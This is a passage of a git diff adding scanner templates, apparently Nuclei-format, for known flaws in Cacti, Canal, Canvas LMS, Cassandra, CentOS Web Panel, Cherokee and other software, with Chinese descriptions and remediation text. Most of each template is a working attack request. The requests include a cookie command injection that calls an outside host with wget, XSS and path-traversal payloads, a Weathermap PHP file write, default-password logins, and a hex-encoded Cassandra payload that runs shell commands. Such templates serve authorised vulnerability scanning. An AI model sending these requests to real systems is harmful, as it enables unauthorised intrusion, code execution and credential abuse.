4、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。
5、使用safe_mode_exec_dir执行可执行的文件路径。将php.ini文件中的safe_mode设置为On,然后将允许执行的文件放入一个目录中,并使用safe_mode_exec_dir指定这个可执行的文件路径。在需要执行相应的外部程序时,程序必须在safe_mode_exec_dir指定的目录中才会允许执行,否则执行将失败。' +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + raw: + - | + GET /graph_realtime.php?action=init HTTP/1.1 + Host: {{Hostname}} + Cookie: Cacti=%3Bwget%20http%3A//{{interactsh-url}} diff --git a/config/51pwn/yaml/Cacti/CVE-2021-26247.yaml b/config/51pwn/yaml/Cacti/CVE-2021-26247.yaml new file mode 100755 index 000000000..e28e683cf --- /dev/null +++ b/config/51pwn/yaml/Cacti/CVE-2021-26247.yaml @@ -0,0 +1,33 @@ +id: CVE-2021-26247 +info: + name: Unauthenticated XSS Cacti - auth_changepassword.php + author: + - dhiyaneshdk + description: |- + Cacti 跨站脚本漏洞 + Cacti是Cacti团队的一套开源的网络流量监测和分析工具。该工具通过snmpget来获取数据,使用RRDtool绘画图形进行分析,并提供数据和用户管理功能。 + + Cacti 存在跨站脚本漏洞,未经身份验证的用户可以通过 http://<CACTI_SERVER>/auth_changepassword.php?ref=地址的 ref 参数成功执行 JavaScript 负载。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.cacti.net/info/changelog + + 临时修复方案:
1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。' +requests: +- matchers: + - type: word + part: body + words: + - '">' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Cacti/Cacti-Weathermap-FileUpload.yaml b/config/51pwn/yaml/Cacti/Cacti-Weathermap-FileUpload.yaml new file mode 100755 index 000000000..9149faa07 --- /dev/null +++ b/config/51pwn/yaml/Cacti/Cacti-Weathermap-FileUpload.yaml @@ -0,0 +1,42 @@ +id: Cacti-Weathermap-FileUpload +info: + name: Cacti Weathermap插件 任意文件写入漏洞 + author: + - jim2g + description: | + Cacti Weathermap插件 任意文件写入漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.cacti.net/ + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"c81e728d9d4c2f636f067f89cc14862c") + raw: + - | + GET /plugins/weathermap/editor.php?plug=0&mapname=test_vuln.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name HTTP/1.1 + Host: {{Hostname}} + - | + GET /plugins/weathermap/configs/test_vuln.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Cacti/cacti-WeakPass.yaml b/config/51pwn/yaml/Cacti/cacti-WeakPass.yaml new file mode 100755 index 000000000..f8df875d4 --- /dev/null +++ b/config/51pwn/yaml/Cacti/cacti-WeakPass.yaml @@ -0,0 +1,35 @@ +id: cacti-WeakPass +info: + name: cacti 默认弱口令漏洞 + author: + - jim2g + description: | + cacti 默认弱口令漏洞 + 弱口令(weak password)通常认为容易被别人(他们有可能对你很了解)猜测到或被破解工具破解的口令均为弱口令。 + 弱口令指的是仅包含简单数字和字母的口令,例如“123456”、“abc123”等,因为这样的口令很容易被别人破解,从而可以直接导致攻击者入侵服务器或控制应用程序。 + 弱口令通常无处不在,在网络设备、安全设备、服务器、OA系统等处均可能存在弱口令,该漏洞特点是覆盖面广、利用门槛低、造成危害大。 + severity: medium + remediation: | + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_2==200 + - contains(body_2,"admin") + raw: + - | + POST /index.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + action=login&login_username=admin&login_password=admin""" + - | + GET /index.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Cacti/cacti-cacti-info.yaml b/config/51pwn/yaml/Cacti/cacti-cacti-info.yaml new file mode 100755 index 000000000..c403fea2b --- /dev/null +++ b/config/51pwn/yaml/Cacti/cacti-cacti-info.yaml @@ -0,0 +1,35 @@ +id: cacti-cacti-info +info: + name: cacti cacti.log 敏感信息泄露漏洞 + author: + - jim2g + description: | + cacti cacti.log 敏感信息泄露漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.cacti.net/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"SYSTEM SYSLOG STATS") + raw: + - | + GET /log/cacti.log HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Cacti/cacti-sql-info.yaml b/config/51pwn/yaml/Cacti/cacti-sql-info.yaml new file mode 100755 index 000000000..af472853d --- /dev/null +++ b/config/51pwn/yaml/Cacti/cacti-sql-info.yaml @@ -0,0 +1,35 @@ +id: cacti-sql-info +info: + name: cacti默认sql数据泄漏漏洞 + author: + - jim2g + description: | + cacti默认sql数据泄漏漏洞 + 由于网站运维人员疏忽,存放敏感信息的文件被泄露或由于网站运行出错导致敏感信息泄露或返回敏感信息的无授权接口泄露。通过这些信息,给攻击者渗透提供了非常多的有用信息。严重可造成大量数据泄露。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.cacti.net/ + 临时修复方案: + 1、去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2、将敏感信息进行加密存储,非必要不可发送前端 + 3、发送敏感信息时需加密传输,如有必要需脱敏处理 + 4、禁止用自己开发的加密算法,必须使用公开、安全的标准加密算法。 + 5、禁止在日志中记录明文的敏感数据:禁止在日志中记录明文的敏感数据(如口 + 令、会话标识jsessionid等), 防止敏感信息泄漏。 + 6、禁止带有敏感数据的Web页面缓存:带有敏感数据的Web页面都应该禁止缓 + 存,以防止敏感信息泄漏或通过代理服务器上网的用户数据互窜问题。 + 7、对必须发送的敏感数据或页面请求接口做好严格的权限认证 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"INSERT INTO cdef VALUES") + raw: + - | + GET /cacti.sql HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git a/config/51pwn/yaml/Cacti/wooyun-2016-0190596.yaml b/config/51pwn/yaml/Cacti/wooyun-2016-0190596.yaml new file mode 100755 index 000000000..00b198ed0 --- /dev/null +++ b/config/51pwn/yaml/Cacti/wooyun-2016-0190596.yaml @@ -0,0 +1,42 @@ +id: wooyun-2016-0190596 +info: + name: Cacti Weathermap插件 任意文件写入漏洞 + author: + - jim2g + description: | + Cacti Weathermap插件 任意文件写入漏洞 + 在Web程序中,通常会涉及到一些文件上传的功能,如头像上传、图片上传、附件上传等,由于Web中间件会根据用户的请求去执行特定后缀的文件(asp、php、cgi、aspx、jsp等),如果在上传文件的功能中未限制上传文件的后缀,导致可以上传“asp、php、cgi、aspx、jsp、html”等后缀的执行文件时,那么攻击者可以利用此漏洞上传恶意的可执行文件来执行恶意的代码,比如文件读写、命令执行,这样即可直接控制服务器。 + severity: high + remediation: | + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://www.cacti.net/ + 临时修复方案: + 文件上传: + 1、服务器端将文件上传目录直接设置为不可执行。 + 2、文件类型检查:建议使用白名单方式(比黑名单更可靠),并结合MIME Type、后缀检查等方式(文件类型做白名单限制)。此外对于图片的处理可以使用压缩函数或resize函数,处理图片的同时破坏其包含的HTML代码。 + 3、使用随机数改写文件名和文件路径,使得用户不能轻易访问自己上传的文件。 + 4、单独设置文件服务器的域名。 + 5、验证文件内容,使用正则匹配恶意代码(过滤恶意代码各种绕过方式,如大小写、BASE64编码)限制上传。 + 6、修复服务器可能存在的解析漏洞。 + 7、严格限制可以修改服务器配置的文件上传如:.htaccess。 + 8、隐藏上传文件路径。 + 9、升级Web Server。 + 10、及时修复Web上传代码。 + 11、不能有本地文件包含漏洞。 + 12、注意0x00截断攻击(PHP更新到最新版本)。 +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code==200 + - contains(body,"c4ca4238a0b923820dcc509a6f75849b") + raw: + - | + GET /plugins/weathermap/editor.php?plug=0&mapname=test1234.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=&map_legend=Traffic+Load&map_stamp=Created:+%b+%d+%Y+%H:%M:%S&map_linkdefaultwidth=7&map_linkdefaultbwin=100M&map_linkdefaultbwout=100M&map_width=800&map_height=600&map_pngfile=&map_htmlfile=&map_bgfile=--NONE--&mapstyle_linklabels=percent&mapstyle_htmlstyle=overlib&mapstyle_arrowstyle=classic&mapstyle_nodefont=3&mapstyle_linkfont=2&mapstyle_legendfont=4&item_configtext=Name HTTP/1.1 + Host: {{Hostname}} + - | + GET /plugins/weathermap/configs/test1234.php HTTP/1.1 + Host: {{Hostname}} + req-condition: true diff --git "a/config/51pwn/yaml/CactiEZ\346\217\222\344\273\266Weathermap/Cacti-Weathermap-FileWrite.yaml" "b/config/51pwn/yaml/CactiEZ\346\217\222\344\273\266Weathermap/Cacti-Weathermap-FileWrite.yaml" new file mode 100755 index 000000000..f64e6ab5a --- /dev/null +++ "b/config/51pwn/yaml/CactiEZ\346\217\222\344\273\266Weathermap/Cacti-Weathermap-FileWrite.yaml" @@ -0,0 +1,28 @@ +id: Cacti-Weathermap-FileWrite +info: + name: CactiEZ插件weathermap任意文件写入漏洞 + author: + - l0ne1y + description: |- + CactiEZ插件weathermap任意文件写入漏洞 + Cacti是一套基于PHP,MySQL,SNMP及RRDTool开发的网络流量监测图形分析工具。Weathermap是cacti中最用的插件之一,用它可以绘制网络拓扑图。 + + CactiEZ插件weathermap存在任意文件写入漏洞,攻击者可以通过该漏洞编写恶意脚本文件从而获取敏感信息。 + severity: high + remediation: |- + **官方修复方案** + 请关注厂商主页及时更新最新版本: + http://cactiez.cactiusers.org/ +requests: +- matchers: + - type: dsl + condition: and + dsl: + - status_code_1==200 && status_code_2==200 + - contains(body_2,"46ea1712d4b13b55b3f680cc5b8b54e8") + matchers-condition: and + path: + - '{{BaseURL}}/plugins/weathermap/editor.php?plug=0&mapname=test.php&action=set_map_properties¶m=¶m2=&debug=existing&node_name=&node_x=&node_y=&node_new_name=&node_label=&node_infourl=&node_hover=&node_iconfilename=--NONE--&link_name=&link_bandwidth_in=&link_bandwidth_out=&link_target=&link_width=&link_infourl=&link_hover=&map_title=46ea1712d4b13b55b3f680cc5b8b54e8&map_legend=Traffic+Load&map_stamp=Created%3A%2B%25b%2B%25d%2B%25Y%2B%25H%3A%25M%3A%25S&map_linkdefaultwidth=7' + - '{{BaseURL}}/plugins/weathermap/configs/test.php' + method: GET + req-condition: true diff --git a/config/51pwn/yaml/Camtron IP Camera/CVE-2010-4231.yaml b/config/51pwn/yaml/Camtron IP Camera/CVE-2010-4231.yaml new file mode 100755 index 000000000..d1c6a2ee1 --- /dev/null +++ b/config/51pwn/yaml/Camtron IP Camera/CVE-2010-4231.yaml @@ -0,0 +1,31 @@ +id: CVE-2010-4231 +info: + name: Camtron CMNC-200 IP Camera - Directory Traversal + author: + - l0ne1y + description: |- + Camtron CMNC-200 IP Camera 任意文件下载漏洞 + 带有固件1.102A-008的Camtron CMNC-200 Full HD IP Camera和TecVoz CMNC-200 Megapixel IP Camera中基于页面的管理界面中存在目录遍历漏洞。远程攻击者可以借助URI中的".."操作符读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.camtron.co.kr + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务。 + 4、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/../../../../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Canal/alibaba-canal-info-leak.yaml b/config/51pwn/yaml/Canal/alibaba-canal-info-leak.yaml new file mode 100755 index 000000000..51565c366 --- /dev/null +++ b/config/51pwn/yaml/Canal/alibaba-canal-info-leak.yaml @@ -0,0 +1,41 @@ +id: alibaba-canal-info-leak +info: + name: Alibaba Canal Info Leak + author: + - l0ne1y + description: |- + Canal Admin API 未授权访问漏洞 + Canal Admin 设计上是为 Canal 提供整体配置管理、节点运维等面向运维的功能,提供相对友好的WebUI操作界面。 + Canal Admin 存在未授权访问漏洞,攻击者可利用该漏洞获取敏感信息。 + severity: medium + remediation: | + **官方修复方案:** + 升级该组件至最新版本。(Canal 1.1.5 已修复 admin下config接口的信息泄露问题 参考链接:/~https://github.com/alibaba/canal/releases/tag/canal-1.1.5) + + **临时修复方案:** + 1、后台管理系统禁止直接暴漏在互联网,需通过VPN等较为安全的接入方式访问内部系统。 + 2、后台管理系统所有页面开启身份认证,根据情况选择对应方式(认证用户,用户名密码)。 + 3、限制IP访问,绑定固定的IP访问后台管理系统。 + 4、采用成熟的权限管理框架,如spring security。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + part: header + words: + - application/json + - type: word + condition: and + part: body + words: + - ncanal.aliyun.accessKey + - ncanal.aliyun.secretKey + matchers-condition: and + path: + - '{{BaseURL}}/api/v1/canal/config/1/1' + method: GET + headers: + Content-Type: application/json diff --git a/config/51pwn/yaml/Canal/canal-default-login.yaml b/config/51pwn/yaml/Canal/canal-default-login.yaml new file mode 100755 index 000000000..7d3584461 --- /dev/null +++ b/config/51pwn/yaml/Canal/canal-default-login.yaml @@ -0,0 +1,41 @@ +id: canal-default-login +info: + name: Alibaba Canal Default Login + author: + - l0ne1y + description: |- + Canal Admin 默认账号密码漏洞 + Canal Admin 设计上是为 Canal 提供整体配置管理、节点运维等面向运维的功能,提供相对友好的WebUI操作界面。 + Canal Admin 存在默认账号密码漏洞,默认账号密码:admin/123456 。 + severity: high + remediation: |- + **官方修复建议:** + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:https://suijimimashengcheng.51240.com/ + 5、推荐口令强度在线检测:https://howsecureismypassword.net/ +requests: +- matchers: + - type: status + status: + - 200 + - type: word + condition: and + words: + - data":{"token" + - '"code":20000' + matchers-condition: and + raw: + - | + POST /api/v1/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json + + {"username":"{{user}}","password":"{{pass}}"} + attack: pitchfork + payloads: + pass: + - 123456 + user: + - admin diff --git a/config/51pwn/yaml/Canvas LMS/CVE-2020-5775.yaml b/config/51pwn/yaml/Canvas LMS/CVE-2020-5775.yaml new file mode 100755 index 000000000..63a9319b4 --- /dev/null +++ b/config/51pwn/yaml/Canvas LMS/CVE-2020-5775.yaml @@ -0,0 +1,23 @@ +id: CVE-2020-5775 +info: + name: Canvas LMS Unauthenticated Blind SSRF + author: + - alph4byt3 + description: |- + Canvas LMS 代码执行漏洞 + Canvas LMS 2020-07-29 存在安全漏洞,未经身份验证的攻击者导致Canvas应用程序对任意域执行HTTP GET请求。 + severity: medium + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.tenable.com/security/research/tra-2020-49 + + 临时修复方案:
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: interactsh_protocol + words: + - http + path: + - '{{BaseURL}}/external_content/retrieve/oembed?endpoint=http://{{interactsh-url}}&url=foo' + method: GET diff --git a/config/51pwn/yaml/CaseAware/CVE-2017-5631.yaml b/config/51pwn/yaml/CaseAware/CVE-2017-5631.yaml new file mode 100755 index 000000000..2c091a912 --- /dev/null +++ b/config/51pwn/yaml/CaseAware/CVE-2017-5631.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-5631 +info: + name: CaseAware - Cross Site Scripting + author: + - l0ne1y + description: |- + KMCIS CaseAware login.php 跨站脚本漏洞 + KMCIS CaseAware是一套用于默认情况管理的单一解决方案。该系统具有高度可扩展性,使用行业标准格式和行业标准传输方法等特点。 + + KMCIS CaseAware中的login.php文件存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意Web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.caseaware.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - '''>' + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Cassandra/CVE-2021-44521.yaml b/config/51pwn/yaml/Cassandra/CVE-2021-44521.yaml new file mode 100755 index 000000000..969a6d7ec --- /dev/null +++ b/config/51pwn/yaml/Cassandra/CVE-2021-44521.yaml @@ -0,0 +1,52 @@ +id: CVE-2021-44521 +info: + name: Apache Cassandra Load UDF RCE + author: + - l0ne1y + description: |- + Apache Cassandra 代码注入漏洞 + Apache Cassandra是美国阿帕奇(Apache)基金会的一个分布式Nosql数据库。Cassandra是一个混合型的非关系的数据库,类似于Google的BigTable。其主要功能比Dynamo (分布式的Key-Value存储系统)更丰富,但支持度却不如文档存储MongoDB(介于关系数据库和非关系数据库之间的开源产品,是非关系数据库当中功能最丰富,最像关系数据库的。 + + Apache Cassandra 存在代码注入漏洞,该漏洞源于在特定配置下攻击者有可能在主机上执行任意代码。攻击者需要有足够的权限在集群中创建用户定义的函数才能利用它。 + severity: critical + remediation: |- + **官方修复方案** + 目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://lists.apache.org/thread/y4nb9s4co34j8hdfmrshyl09lokm7356 +network: +- matchers: + - type: word + part: raw + words: + - "123123" + host: + - '{{Hostname}}' + - '{{Host}}:9042' + inputs: + - data: "050000000500000000" + type: hex + read: 1024 + - data: 0500000101000000530003000b4452495645525f4e414d450016446174615374617820507974686f6e20447269766572000e4452495645525f56455253494f4e0006332e32352e30000b43514c5f56455253494f4e0005332e342e35 + type: hex + read: 1024 + - data: 3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a + type: hex + read: 1024 + - data: 7f0002a6a69f0500000407000000760000005e435245415445204b4559535041434520746573742057495448207265706c69636174696f6e203d207b27636c617373273a202753696d706c655374726174656779272c20277265706c69636174696f6e5f666163746f7227203a20317d3b0001000000340000006400080005d82cc8ca390f0ddce06b + type: hex + read: 1024 + - data: 7d000296664f0500000807000000740000005c435245415445205441424c4520746573742e7263652028636d642076617263686172205052494d415259204b455929205749544820636f6d6d656e743d27496d706f7274616e742062696f6c6f676963616c207265636f726473273b0001000000340000006400080005d82cc8cb2fc161951510 + type: hex + read: 1024 + - data: 1c030291ff34050000100700000313000002fb637265617465206f72207265706c6163652046554e4354494f4e20746573742e657865632820636d64207465787420290d0a2020202052455455524e53204e554c4c204f4e204e554c4c20494e5055540d0a2020202052455455524e5320746578740d0a202020204c414e4755414745206a6176617363726970740d0a2020202041532024240d0a202020207661722053797374656d203d204a6176612e7479706528226a6176612e6c616e672e53797374656d22293b53797374656d2e73657453656375726974794d616e61676572286e756c6c293b0d0a202020207661722065203d746869732e656e67696e652e666163746f72792e736372697074456e67696e652e6576616c2827766172206f736e616d65203d206a6176612e6c616e672e53797374656d2e67657450726f706572747928226f732e6e616d6522293b6f736e616d65203d206f736e616d652e746f4c6f7765724361736528293b7661722073706c6974203d206f736e616d652e73746172747357697468282277696e2229203f20222f6322203a20222d63223b76617220636d6450617468203d206f736e616d652e73746172747357697468282277696e2229203f2022636d6422203a202262617368223b76617220636f6d6d616e64203d2022272b636d642b27223b7661722073203d205b636d64506174682c2073706c69742c20636f6d6d616e645d3b70203d206a6176612e6c616e672e52756e74696d652e67657452756e74696d6528292e657865632873293b766172206272203d206e6577206a6176612e696f2e4275666665726564526561646572286e6577206a6176612e696f2e496e70757453747265616d52656164657228702e676574496e70757453747265616d282929293b766172207265733d22223b7768696c652028286c203d2062722e726561644c696e6528292920213d206e756c6c29207b202020207265732b3d6c3b7265732b3d6a6176612e6c616e672e53797374656d2e6c696e65536570617261746f7228293b7d27293b0d0a20202020653b0d0a2020202024243b0001000000340000006400080005d82cc8cc7ece89646c85 + type: hex + read: 1024 + - data: 51000278033505000014070000004800000030696e7365727420696e746f20746573742e72636528636d64292076616c75657328276563686f2031323331323327293b0001000000340000006400080005d82cc8cd5b810ef0b16e + type: hex + read: 1024 + - data: 450002bff1d805000015070000003c0000002473656c65637420746573742e6578656328636d64292066726f6d20746573742e7263653b0001000000340000006400080005d82cc8cd99d444271281 + type: hex + read: 1024 + - data: 3e000218aeb50500000307000000350000001d64726f70204b455953504143452049462045584953545320746573743b0001000000340000006400080005d82cc8ca0e4fcdde8c0a + type: hex + read: 1024 diff --git a/config/51pwn/yaml/CentOS Web Panel/CVE-2018-18323.yaml b/config/51pwn/yaml/CentOS Web Panel/CVE-2018-18323.yaml new file mode 100755 index 000000000..1038aaf6f --- /dev/null +++ b/config/51pwn/yaml/CentOS Web Panel/CVE-2018-18323.yaml @@ -0,0 +1,28 @@ +id: CVE-2018-18323 +info: + name: Centos Web Panel 0.9.8.480 LFI + author: + - 0x_akoko + description: |- + CentOS Web Panel 本地文件包含漏洞 + CentOS Web Panel是一款CentOS Lnuix系统管理面板。 + + CentOS Web Panel 0.9.8.480版本中存在本地文件包含漏洞。目前尚无此漏洞的相关信息,请随时关注CNNVD或厂商公告。 + severity: high + remediation: |- + 官方修复方案:
1、升级系统至无漏洞版本,或于官网下载安全补丁。 + http://centos-webpanel.com/ + + 临时修复方案:
1、PHP 中使用 open_basedir 配置限制访问在指定的区域,路径长短截断
2、过滤.(点)/(反斜杠)\\(反斜杠),编码绕过
3、禁止服务器远程文件包含
4、对于限制了包含文件后缀的情况,PHP版本小于5.3,php.ini magic_quotes_gpc = off,对可控参数未使用addslashes函数,满足这三个条件就可以使用%00截断。
5、问号、井号、空格绕过(远程) +requests: +- matchers: + - type: regex + regex: + - root:[x*]:0:0 + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/admin/index.php?module=file_editor&file=/../../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Cherokee/CVE-2006-1681.yaml b/config/51pwn/yaml/Cherokee/CVE-2006-1681.yaml new file mode 100755 index 000000000..704d51217 --- /dev/null +++ b/config/51pwn/yaml/Cherokee/CVE-2006-1681.yaml @@ -0,0 +1,34 @@ +id: CVE-2006-1681 +info: + name: Cherokee HTTPD <=0.5 XSS + author: + - l0ne1y + description: |- + Cherokee HTTPD 跨站脚本漏洞 + Cherokee是一款开源的Web服务器。 + + Cherokee HTTPD 0.5及早期版本中存在安全漏洞。这使得远程攻击者可以借助于产生HTTP 400错误的畸形请求注入任意Web脚本或HTML。当出错信息产生时,该请求没有得到正确地处理。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.alobbs.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: status + status: + - 200 + - type: word + words: + - + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/%2F..%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E' + method: GET diff --git a/config/51pwn/yaml/Chyrp/CVE-2011-2744.yaml b/config/51pwn/yaml/Chyrp/CVE-2011-2744.yaml new file mode 100755 index 000000000..2f86362ef --- /dev/null +++ b/config/51pwn/yaml/Chyrp/CVE-2011-2744.yaml @@ -0,0 +1,33 @@ +id: CVE-2011-2744 +info: + name: Chyrp 2.x - Local File Inclusion + author: + - l0ne1y + description: |- + Chyrp任意文件读取漏洞 + Chyrp是一款开源的基于PHP和MySQL的轻量级博客(Blog)引擎。 + + Chyrp 